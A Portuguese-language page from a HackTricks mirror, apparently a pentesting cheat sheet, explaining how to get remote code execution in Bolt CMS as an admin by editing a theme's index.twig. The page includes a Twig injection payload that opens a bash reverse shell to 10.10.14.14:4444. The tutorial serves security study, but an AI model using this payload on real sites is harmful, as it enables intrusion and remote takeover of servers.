Mirrors/hacktricks

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 13:43:24 +00:00

Translator b3dfffa5f1 Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

2024-07-19 11:31:17 +00:00

3.4 KiB

Raw Blame History

Bolt CMS

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

{% endhint %}

RCE

Após fazer login como admin (vá para /bot para acessar o prompt de login), você pode obter RCE no Bolt CMS:

Selecione Configuration -> View Configuration -> Main Configuration ou vá para o caminho da URL /bolt/file-edit/config?file=/bolt/config.yaml
Verifique o valor do tema

Selecione File management -> View & edit templates
Selecione a base do tema encontrada no passo anterior (base-2021 neste caso) e selecione index.twig
No meu caso, isso está no caminho da URL /bolt/file-edit/themes?file=/base-2021/index.twig
Defina seu payload neste arquivo via template injection (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
E salve as alterações

Limpe o cache em Maintenance -> Clear the cache
Acesse novamente a página como um usuário regular, e o payload deve ser executado

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

{% endhint %}